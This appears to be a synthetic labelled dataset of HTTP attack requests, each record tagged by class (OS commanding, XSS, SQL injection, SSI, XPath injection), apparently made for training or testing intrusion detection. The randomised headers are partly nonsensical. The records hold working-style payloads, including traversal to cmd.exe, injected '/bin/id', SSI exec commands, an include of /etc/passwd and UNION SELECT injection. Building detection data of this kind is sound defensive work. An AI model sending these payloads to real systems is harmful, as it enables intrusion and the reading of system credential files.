Referer: /voqEod/sucik/hirr7on2/oeeoonrt.aspx
TE: deflate;q=0.6,chunked;q=0.1
Trailer: Cache-Control
User-Agent: n9ear/0.5.4
UA-CPU: x86
UA-Disp: 4133,8176,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4720x346
Via: HTTP/9.2 www.Enistre.shtml, jth/5.6 www.03mp.png, 1.6 www.wiu0n.gif
Transfer-Encoding: lnmos
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 8496085011716773
----: ------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42623
Start - Id: 36520
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 137.75.174.88
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: lvl7cgsd-isilan;q=0.0, daienir-eteneh2a;q=0.8, se-yeea;q=0.2, yo7oc-euaw
Cache-Control: min-fresh=741
Client-ip: 65.215.179.86
Cookie: meBo6xeieeseog=wowqmt;esaid73ol1ltc=22100;z8MiP6_=1uI1s23tuI;MmesteaE=94;8UB.V06iE=3\esASa
Cookie2: $Version="0"
Date: Fri, 04 May 07 17:03:29 CET
ETag: W/"SUqEZhdabUnFaONcxFdw"
Expect: 100-continue
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Mon, 19 Jun 06 18:58:13 UTC
If-Unmodified-Since: Sat, 23 Jul 05 07:12:40 CET
If-Match: "@2hN50taAeHdG8U"
If-None-Match: "CNDAgVyjBN2GHE2o"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.5
Pragma: osc6St=th
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: NTLM d3Jtb3RpbmVzY240ZWkwb09sYWhvYVRlcm5wZHRseWhlOGk=
Range: 17-
Referer: http://www.Desocloi.st/tiPi.gz
TE: deflate;q=0.8,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/2.8 (Windows; U; Win 9x 8.4; bg-io; rv:3.0.3) Gecko/55861617
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9877x8489
Via: 3.0 www.asSaxetn.gif, 3.5 221.229.147.43
Transfer-Encoding: deflate
Upgrade: r1teH/3.1, tnlo/6.6, Mbo1ue/5.1, faabak/8.4, hontz/8.0
Warning: 264 www.atriB3fe.css "fiechfo" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36520
Start - Id: 46875
class: XSS
POST /a8fserreettshafns.exe? HTTP/1.1
Content-Length: 137
Content-Language: 5ionnnj
Content-Encoding: deflate
Content-Location: /oeii/2CruW2R/toay/8sti/McaEsfr.bin
Content-MD5: T1RlUmZ5ZWFzcm1uaXdlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 06 Jan 10 18:57:16 CET
Last-Modified: Fri, 22 Jun 07 21:28:56 UTC
Host: 90.118.33.128:340
Connection: close
Accept: image/*, text/html
Accept-Charset: *;q=0.2
Accept-Encoding: compress, compress;q=0.1
Accept-Language: etoIh-o;q=0.5
Cache-Control: no-transform
Client-ip: 89.81.27.19
Cookie: eftsWO=htytMoTnwinnt|;1zhttps9NG=httpseeio?peDa8ee
Cookie2: $Version="8"
Date: Sun, 27 Jan 08 07:23:11 UTC
ETag: "qpH2R-@HEM1V6hUP"
Expect: mleses2
From: xorersew@0i1thu.fr
If-Modified-Since: Thu, 04 Feb 10 16:49:13 UTC
If-Unmodified-Since: Fri, 08 May 09 05:57:59 CET
If-Match: "RYN5Ev1671H6Ag1W"
If-None-Match: *
If-Range: *
Max-Forwards: 855
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest nonce
Range: -692,548156-61437,-79
Referer: http://www.eTss.net/Fweeb5eq/ukcjdesd.rar
TE: trailers,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: gtprtun
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2245x173
Via: 4.1 www.ramcnooi.jpeg:4355
Transfer-Encoding: deflate
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 479 70.40.194.240 "olAdtnTro" "Wed, 14 Apr 10 22:00:41 UTC"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

itD=mM&sdltaRsgtv4ri=<link   rel   =" stylesheet  "    href   =    "   javascript:[alert   ('2h9ntc');]">

End - Id: 46875
Start - Id: 43156
class: OsCommanding
GET /rtm6heo4ebe/dtniS3lisnPclqky/mvWVRbJrj9woc9PUFPp8/p8ecnEsmss6O.bin?ohblicbloj2sVH=sopens&s3tnxo1mtift=m.WPGmA11CTB&jo5tulisI=%5C%3B++%5C%2Fbin%5C%2Fid+++++%3B&duatdhohsme=787234718 HTTP/1.0
Host: 57.94.120.253
Connection: close
Accept: audio/x-wav;q=0.0, image/png, audio/x-wav;q=0.8
Accept-Charset: windows-1257, iso-8859-7, x-mac-icelandic;q=0.4, iso-8859-8;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 66.158.131.150
Cookie: ZgH15j3d=wOo
Cookie2: $Version="36"
Date: Thu, 20 Dec 07 14:09:27 UTC
ETag: "8Si792-o4C3zcdKh6"
Expect: aNg2ee
From: riAeyrh@tgaMea.st
If-Modified-Since: Fri, 06 Apr 07 16:04:23 UTC
If-Unmodified-Since: Sat, 15 Jul 06 09:15:43 GMT
If-Match: "UOflgWQ3He.Mn2-krRv9"
If-None-Match: "UoQL0QEGsw-9tk4lG"
If-Range: Fri, 04 May 07 05:47:31 UTC
Max-Forwards: 69
MIME-Version: 1.6
Pragma: dt='6ol'
Proxy-Authorization: 4lhm thmdu=aoeoa
Authorization: Basic RGVvcGpnNjpkb3RpT0hl
Range: 46359-,93372-15,76-
Referer: /nmtafeen/ocsWseqn.aspx
TE: trailers
Trailer: If-Match
User-Agent: esna/2.5.7.1
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 807x674
Via: sorse/2.7 www.heeeEi.shtml
Transfer-Encoding: deflate
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 9.181.32.5
X-Serial-Number: 97812200258960530552
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43156
Start - Id: 41631
class: SqlInjection
GET /atlsuitvtYx3HTmteug/ii7iviheuiioodenbn/raaatscshaaeusoEti/7qSCaSQ8a/obvi7rl/iWKc2jfjRfO7_Qu/hjC4JQMHELn.png?h4uOnliediocI=on%2Fhzeo%2Ft%3En1&NOv@I=0289&w0a=OrigText%27OR%27cin%27++%3D%27urrh6%27&waws=n1n HTTP/1.1
Host: 6.218.216.229
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ttta-d, IeesR-ihii3m
Cache-Control: max-age=332
Client-ip: 228.176.17.121
Cookie: iIH=4627231
Cookie2: $Version="5"
Date: Sun, 26 Mar 06 07:36:33 GMT
ETag: "-cn@c9fe6TG-hI_N3z@F"
Expect: dSei2edr=aNexTn
From: xrtw@gme1s0.it
If-Modified-Since: Sun, 18 Mar 07 17:05:51 UTC
If-Unmodified-Since: Fri, 04 Nov 05 17:29:12 GMT
If-Match: "ANlUb@68rpGQSJn"
If-None-Match: *
If-Range: Tue, 18 Apr 06 24:05:08 GMT
Max-Forwards: 543
MIME-Version: 5.2
Pragma: egNnasew='sade'
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: izeorn 4gth5pdm=nati4t
Range: 53962-110288
Referer: /ldrhepta/rleeho/aoae3tie.php3
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.7 (compatible; Konqueror/5.7; Linux i586; o1hE18)
UA-CPU: Sparc
UA-Disp: 5571,966,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: 7.1 37.150.156.240, aayE/0.2 99.81.231.24:7227, 9.6 80.152.60.92
Transfer-Encoding: gitps
Upgrade: ncT/8.9, 9ri4/6.4
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41631
Start - Id: 40053
class: SSI
GET /deletesnetcat/Tteoeerei/effqOVfbxqtRX/htD1b/qoUOm@pu1Bo/oh3-X/oK9F0U2sS/uewoemTft/i8cCEOP/mJByl0h84qT.php?petsbp=80j&iheykm9=xmlOpositiontn&uit9ltyr=18472631&loiisrs6Atv=eo10knH%40rdT&8ab7p5td=30&ap8aWif3=lo59M4hole4sA&eacTdsVyB=tns&i1wes6ruE9teu=a+a&eh8ee6TbV=%3C%21--+++%23exec+cmd%3D%22%2Fbin%2Fls++-l++%2Fhome%2FOfeew7owLg%2F6i%22++++--%3E&NC8tthUoIl5can7=fromRdibrcecopystey%27%5CH&8ratEwsh1e=ui HTTP/1.0
Host: www.hg3cs.uk:80
Connection: close
Accept: text/xml;q=0.8
Accept-Charset: x-mac-hebrew;q=0.2, iso-8859-2, isiri-3342, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: *
Cache-Control: t='Rdatebrd'
Client-ip: 9.121.250.171
Cookie: Ekf5oenm=ijnrPaoi6;tetgrwnr22=xlE=yohttpseeglteng>otaccept;hhsedepdnarFe=)b autoexece;o7=1053;t0vd=08209722
Cookie2: $Version="977"
Date: Fri, 15 Jul 05 04:50:05 CET
ETag: "E13puIippJH_MZisUTlR"
Expect: 100-continue
From: eto0Hh@8untinHaB.de
If-Modified-Since: Sat, 06 Mar 10 15:33:13 UTC
If-Unmodified-Since: Sun, 03 Jun 07 21:41:11 GMT
If-Match: "BZGI_H@5lmn62uykm1E7"
If-None-Match: *
If-Range: "Hkmy4h@P4_ZvxaB"
Max-Forwards: 196
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic bWVlb206aXVvdA==
Authorization: NTLM ZGhzaHRkZDJwd3NhaWV0cGRvNm9nT2loblVaZUVvc2FvdmZ1dG9IZQ==
Range: 271-,17364-
Referer: /nr4tdys/ureinf.php3
TE: gzip;q=0.4,deflate;q=0.1
Trailer: User-Agent
User-Agent: Mozilla/6.1 (X11; U; SunOS sun4u 2.1; is-x9; rv:7.6.4) Gecko/56725112
UA-CPU: PowerPC
UA-Disp: 098,0653,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4665x776
Via: 2.1 173.238.200.153, 4.2 225.183.93.157, 4.8 www.3non7hcn.gif:42
Transfer-Encoding: deflate
Upgrade: cGu/7.6
Warning: 301 www.aNxatsl.gif "mcn8ho5" "Mon, 26 Jan 09 23:46:07 CET"
X-Forwarded-For: 91.94.98.157
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40053
Start - Id: 42784
class: SqlInjection
PUT /rmsstug6ettxdh/a3ry2o3tq49rFhtcnett/o9zYk/AHrr/nrFoaKyjVeyGh9F/lwgllasaCjioA/ceTaiaeltnbgsW/t8K0/vcME4.idN-/mp/vota/7eotlirtEeauuelfant8.gif? HTTP/1.0
Content-Length: 56
Content-Language: Ac,7agt
Content-Encoding: identity
Content-MD5: aDF0dGk0ZHRkWE9IemVzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Dec 04 04:46:58 CET
Host: 132.134.187.231
Connection: e9tgsda6
Accept: audio/*;q=0.5, text/xml, application/postscript;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 62.36.167.216
Cookie: nqtttohg=as2g;an='  )    UNION     ALL SELECT     'gneenr',1851,8077,'athitxas',064   FROM  ezde8osjso    WHERE    (''  =    ';teReopF=iTI5;ri=qPPhsa
Date: Wed, 28 Jan 04 16:48:27 GMT
Expect: inoo=eim1ra;appii=zUlwotO
From: tchoc@di1ltcs.biz
If-Unmodified-Since: Tue, 22 Sep 09 23:34:49 UTC
If-Match: *
If-Range: *
Max-Forwards: 6
Pragma: wOkkg='h'
Authorization: NTLM aHd0YWtsQ2NhbzRlYVNpcnFhbWE0bjQ1b250Y3NsZWhCd2llOWltYTc=
Referer: /rtaoeI7o.gif
Trailer: Expect
User-Agent: haab0t06oi/5.1
UA-Disp: 3032,464,8
Via: FTP/4.2 75.34.174.51, oglez/5.9 191.133.186.98, 1.1 www.aNos4t.gif
Transfer-Encoding: htuozh
Upgrade: doh/4.6, sv4t/6.6
X-Serial-Number: 2167956
----: --------------------------

ymarvqape=rqF9p&9.CtXP9xf=aM6M&strfefflnm6is=t@U0J8ymg

End - Id: 42784
Start - Id: 42008
class: SqlInjection
GET /luNwNx/e2hcKxH2XntgNb-/mA4x0WEI@W4/vELjlneeuE9/tsthztaetirttnbrs/nw7/jU/ow4mIzVCMfUo5w@ZlH5W/fhsetaieDufi4/4GVBOM9jZ.SxVdr3/awEhoisnidal/amfRU8FsxYpzwia.jsp?t3efDa=8&siE2enAsiH=d8lSUeis&tevv2ceHgr=%27+OR+++++%27npywed%27+%3D++++%27++++&dhgewsicasleami=91000 HTTP/1.0
Host: www.4dswrbo6a.be
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: Lredhhh-ehcR, e-abi7rfoz;q=0.6, l3stmW6-tn;q=0.7, eeexbm-g1oaxcs;q=0.9
Cache-Control: no-cache
Client-ip: 11.178.28.161
Cookie: nsseltyattaie9o=33585;OETffeIyO=eepasswd;V@9bgsoundh57h8dre=503999
Cookie2: $Version="53"
Date: Wed, 03 Aug 05 22:31:26 UTC
ETag: "B3glT-8JF-SL@BPzG.S"
Expect: 100-continue
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Wed, 04 Oct 06 22:40:15 UTC
If-Unmodified-Since: Sat, 12 Aug 06 09:45:45 CET
If-Match: "i@m@QaTeCTsY8H8GiLIo"
If-None-Match: "4jIoEHL7roMwB2w"
If-Range: Thu, 13 Aug 09 09:08:32 GMT
Max-Forwards: 0
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: /ueeje/nmtOelho.css
TE: trailers,trailers
Trailer: Trailer
User-Agent: timuBlqtt/4.5
UA-CPU: StrongARM
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0057x268
Via: 6.5 www.eztenomo.js, 9.3 www.eemt.css, HTTP/6.3 234.176.233.231:9350
Transfer-Encoding: compress
Upgrade: efau/6.6
Warning: 117 www.dpoc.html "usfeuteterl01" 
X-Forwarded-For: 242.20.82.168
X-Serial-Number: 063116688396663
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 42008
Start - Id: 40322
class: SSI
GET /hH1aO5R_-r069k/lPpasswd7htpassletcJuF7HEmS/sM/dtrecd.html?uCoMah=qc&i6lahaeSW=ho0soduetbtduea&tnth2mnef=%3C%21--++%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5Cajtelesi%5Ciadr3mio%5Cmkaaela.exe+++d%3A%5Coghet%5Cwww.aretneme.org%5C9glodedYeb%5Cdatabase.mdb++%2Fx++exporttofoxpro%22--%3E HTTP/1.0
Host: www.htdr9enhMm.de
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-korean, x-mac-chinesetrad, koi8-r, us-ascii, windows-1257;q=0.0
Accept-Encoding: 
Accept-Language: tnalntp-p;q=0.1, tk-ithr7, fetr-qEehos;q=0.4
Cache-Control: no-transform
Client-ip: 239.88.55.52
Cookie: tiu=750371;nsD6lwNeianah7l=eI7K07oO-;hnllomh=evy3;tyaflm5prdr=liio
Cookie2: $Version="373"
Date: Tue, 12 Oct 04 21:20:25 UTC
ETag: W/"BreSvbANyEzg2vf5"
Expect: z0lexn8
From: rpic1ucn@6o6hir.ch
If-Modified-Since: Sun, 01 Jun 08 20:26:42 CET
If-Unmodified-Since: Sun, 22 Jun 08 08:45:06 GMT
If-Match: "eb82OlqOVyIEXGn4kH"
If-None-Match: "lFpurYD-4izqy-e70u6P"
If-Range: *
Max-Forwards: 6
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: intehp 4edI=sr6n1ysd
Authorization: NTLM dTFwbnVzZGVsZW81Y2dvc2RsQTF0bWc0aElubmNucmllYXRh
Range: -2115,0045-233,-51
Referer: http://www.mqooE.uk/hnic/ionfd/eiqtimm/9e6dhmi/iQasd.dll
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: iRFvamTing http://www.sXTohhe.org
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8587x911
Via: HTTP/5.4 146.2.135.165, FTP/3.2 www.etner.htm, 7.8 www.onaue.tiff
Transfer-Encoding: j0lal9; 7nr7slMO=3sie4i
Upgrade: lsMg/8.4, roInr/1.2, reHn0e/2.0
Warning: 196 2.26.22.3:993 "ye78torehxsveoUeewSd" 
X-Forwarded-For: 114.213.56.41
X-Serial-Number: 475557970524
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40322
Start - Id: 35733
class: XPathInjection
GET /9o7QTlikeBMNde/F4Cp.gif?lkHdtQpefi=bmg&c4ohyu=bh_roNkL7jf&wiccaerAp=Jiwoc&uwOwkK=tto%5Dihadminmh3dnodeyDoptLe%24&EeiNtN=47&ctxrrsn9rohw8=OrmTeb&ncradkstIlpera7=h7y&liN43SPfqmochaRD=e5rmailb%25it&rrf=gEd5%27++or+++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28++++i%2B++++j++%2B++k%2B++l+++%2B++++1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++%27enertgU%27%3D++++%27+eN4nt%27++or HTTP/1.1
Host: www.reei2ni.ch
Connection: sxtedye
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: eqtM-i, bwletCn-t, ea-rnrs, tn-s, l7eiwrto-p
Cache-Control: no-transform
Client-ip: 55.42.106.115
Cookie: rrr1=94796;xhvs-cHI=Jo@hi;ihCmS7SInodeLY=4688481
Cookie2: $Version="6"
Date: Fri, 14 Nov 08 22:31:19 GMT
ETag: "@h5CKoF7ijyntN2r"
Expect: 100-continue
From: dkgpi@e0eolroeA.ch
If-Modified-Since: Thu, 06 Jul 06 15:42:17 UTC
If-Unmodified-Since: Sun, 25 Jun 06 23:14:26 CET
If-Match: "o_b_lmCf8w3dYtr"
If-None-Match: *
If-Range: Mon, 16 Feb 04 22:31:17 CET
Max-Forwards: 6
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Z3Ntc2hscmZlTk5vc3JpYWVsYWVubGV0SWVhZ25lTXNueDl3c2VOeXN0cGVybnJh
Authorization: Digest nonce
Range: 820401-
Referer: http://www.nnhpce.be/oOXni/eiqUha/oar8are/taieCetn.pdf
TE: gzip,trailers
Trailer: Expect
User-Agent: raeEqoozereo
UA-CPU: x86
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: FTP/7.5 55.50.151.27, hiAtn/7.8 www.etihU.jpg
Transfer-Encoding: deflate
Upgrade: prjil/8.6
Warning: 062 28.97.213.16:8903 "sReeeib4oHnlluegrtr" "Fri, 31 Oct 08 14:57:27 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 126041771570096080
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35733
Start - Id: 46669
class: XSS
GET /pwv7Xshutdown1AQshutdown.gif?H5wtmpaED=ttoroe+ot7ttta&otctAi8cwedn=07964877 HTTP/1.1
Host: 37.130.186.79:5
Connection: fe8iiebg
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 162.233.42.246
Cookie: ztbssuP2mdenai=Yueceie n;oknTrvwnumyidoe=lEH;n7d=e/;enl3u7ttreDmig=srnie;oabei=ha;xVT@qKQgZlLu=<img  src =    "     toanatnana  > "    onmouseover =    "     [alert   ('aaegrm');]  "    >
Cookie2: $Version="486"
Date: Mon, 15 Sep 08 11:10:40 UTC
ETag: "xhOS7_23KkddidlGj"
Expect: 100-continue
From: os7ddt@2hedt3.cz
If-Modified-Since: Tue, 20 Apr 10 17:10:17 UTC
If-Unmodified-Since: Tue, 02 Jan 07 22:03:53 UTC
If-Match: "Lqxzz2@2WmEidge2MX_r"
If-None-Match: *
If-Range: *
Max-Forwards: 6129
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="es5nbc"
Authorization: Basic b2JuODQ3OndhOGFhY3g=
Range: -3820,-75
Referer: http://www.smmyOfu.st/uene8rc/eee3T.js
TE: trailers,gzip;q=0.8
Trailer: Referer
User-Agent: Mozilla/3.3 (X11; U; Open BSD i586 5.3; ed-ts; rv:7.1.9) Gecko/61523328
UA-CPU: PowerPC
UA-OS: Linux
UA-Color: color8
UA-Pixels: 630x4242
Via: 7.8 249.60.46.84
Transfer-Encoding: identity
Upgrade: sNn/2.2, tbnncm/6.1
Warning: 792 204.144.50.16 "veibcehaticgi" 
X-Forwarded-For: 180.229.29.245
X-Serial-Number: 19077842196498
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46669
Start - Id: 40827
class: SSI
GET /5eyesrru/IRmnM0binhVbX0.png?qafelreouc=idniTsuukUr+Wa&mis=54277&sxefndorahtptne=45329&dhg=t+zhi&yi=daseR1_hJce-&a5rvge=98&0geltd9lyxk=%3C%21--+++%23odbc++connect%3D%22tsntil%2CTds%2Csml%22++++statement%3D%22select+++*+++from+++++tu%22--%3E&elDe4r7dsntr=s9B%40&5uohusies=06550882&aseo=3&sOMU=idtInsqeHa&4razeirOg=eiS7eaojeDte&seTzwl=tui&esHwhtdat=script&F759qtM38=ca1Dof2sllm HTTP/1.0
Host: www.naao.it:95
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-7;q=0.3, x-mac-ce, shift_jis;q=0.9, x-mac-arabic;q=0.6
Accept-Encoding: 
Accept-Language: entro-Xoadh4h;q=0.8, chuueiA-httsh, nZn5oDi-eqZu, woast7r-r62chst, ytcct-r;q=0.9
Cache-Control: max-stale=7267
Client-ip: 244.239.23.2
Cookie: CzjIztmp9WF02=gmmtlcs;aseyteotifs=ss;or;Ibspsulxsddso=550713;bkyTj=vTsH6EtSS.x;hhHselcS=77260;rsuzErizyo=hlibn\cnri
Cookie2: $Version="76"
Date: Wed, 03 Dec 08 11:07:10 CET
ETag: W/"kwmIzY..D6fs-WSA0"
Expect: R4w4=f6aeth
From: heeo2q@daRia.de
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Fri, 20 Mar 09 13:48:03 UTC
If-Match: "RhS9OT_ewEpWHXoG-"
If-None-Match: *
If-Range: Sat, 10 Mar 07 12:00:02 GMT
Max-Forwards: 67
MIME-Version: 9.6
Pragma: uerfdvol='h3'
Proxy-Authorization: es08e taeiRD8d=u4req1e
Authorization: NTLM MmlldGlveWVtZWJuYWRtbnR4dEV3aXNob250b3U4T3NzTGNpc3JlZTU=
Range: -249125,25682-,-362822
Referer: http://www.f2ne.org/ErB4ioe.msf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: qmdigsioLh (aphTzj; 23Jq2@eLn@)
UA-CPU: PowerPC
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 938x7282
Via: FTP/2.6 154.8.51.40, 2.6 www.3hTinAj.jpg:0660, FTP/8.6 127.140.243.71
Transfer-Encoding: deflate
Upgrade: tU7st/9.0, tata/7.6, nhs/2.5, attto/4.3, a7pt/7.6
Warning: 601 42.121.7.112:3 "rlcreLunhecrNsee" 
X-Forwarded-For: 213.213.96.18
X-Serial-Number: 623411
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40827
Start - Id: 39733
class: SSI
GET /cKc4_4@18nx6q0/gitlUt9p/e7mMmmIkDelEOBrqkX/hxl3JXAnCe./riB/6-BOL/ses/Dj3fqH/sh7z.z/sinjxo/nnzeisacnhdochg.mspx?jn3=6e6fiHaeliiesiqes&rnndsagcbq7h=omK8l2hx&lunoorAEstew=%3C%21--+++++%23include+virtual%3D%22%2Fetc%2Fpasswd%22--%3E&euifgE=446365&iwktAOhecbaxUtg=88&OPtelnetI7wsf=034777&hon=gpRxhPou63.o&tree=ia6N&iepssito=tbCfdJz HTTP/1.0
Host: www.u2enaw2t.it
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.7, compress
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 55.223.250.116
Cookie: ktnna=5@JHgyCGc
Cookie2: $Version="8"
Date: Sun, 31 Aug 08 07:23:47 GMT
ETag: "RpokNe@hiUrDxRmesWrO"
Expect: 100-continue
From: edtEiwvr@nastnEtx.it
If-Modified-Since: Fri, 14 Mar 08 12:02:49 GMT
If-Unmodified-Since: Fri, 23 May 08 16:48:19 CET
If-Match: *
If-None-Match: *
If-Range: "OMI6F.kthXvJj_fs"
Max-Forwards: 9
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: 5O8lgd dEae=hb6eE
Authorization: Digest uri=/ao8jotie/tceDol/t9i8Oais/isto/TeGi3t.mp3
Range: -58,-7,-12255
Referer: /eeoe1o/rtszi.msf
TE: gzip,trailers,chunked
Trailer: Host
User-Agent: osqeelnAe77rrt
UA-CPU: Sparc
UA-Disp: 9987,6027,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 602x675
Via: 5.5 248.58.121.185, 0.5 235.82.229.117, 6.6 www.ten5.js
Transfer-Encoding: identity
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 878025809262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39733
Start - Id: 43559
class: OsCommanding
GET /aqc4mqRAQEXZ922/Dte8i/55r4OdnshetnaAhes8l/tJGDhY/znNTa7ardbsalez8nSe/dI_http6documentc53E/BnetcatqxMDK4Vbinrcp@/yzaelesis.jpg?2tte=mailpiht&7dnnwllrwTEbo=8662361752&IxzJXE_d4jb=zs5reohbhot%40qhh9&ltHy=toi2i&si=%7C+++id+%7C&eaE=nytfnenerp4iaihyie HTTP/1.1
Host: www.gbos.uk:4346
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 214.70.1.175
Cookie: eTTanstng=n<lasi5re8;onWhnr=941;gke0=opt;I4Ld0avChttpkuv=r 7]fiphp lP;nllc=oreplacen
Cookie2: $Version="88"
Date: Sun, 08 May 05 23:55:42 CET
ETag: "60KWnTBuO0WR3pn7X4Yx"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Tue, 08 Apr 08 24:59:03 CET
If-Unmodified-Since: Sat, 24 Apr 10 04:11:51 GMT
If-Match: "OocUsqj8sAMR@yi"
If-None-Match: "xda6ERacz_uD_f3R.sJ"
If-Range: "CT8FV.6p_EE5..7"
Max-Forwards: 6669
MIME-Version: 7.0
Pragma: in=eeY3titb
Proxy-Authorization: NTLM YmxvNHRwYW5pdHhhdTNhaGhpY3R0ZGg5c2luUm5kczVlZElzYWE=
Authorization: NTLM eWFDYXR0ZURUbXRuemE0YWRjcTVpZ2V1NGdoakhyN2pmZW9t
Range: -262090,-9
Referer: http://www.eqenm.gov/Temeaw/mrur/iNsPho/etur.mspx
TE: chunked;q=0.5,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.6 (X11; U; Solaris 8.9; ld-Te; rv:6.6.8) Gecko/12086112
UA-CPU: x86
UA-Disp: 307,4277,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: FTP/0.1 99.210.176.60, 1gh/9.6 66.137.93.84
Transfer-Encoding: identity
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 36797879465846791
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43559
Start - Id: 40319
class: SSI
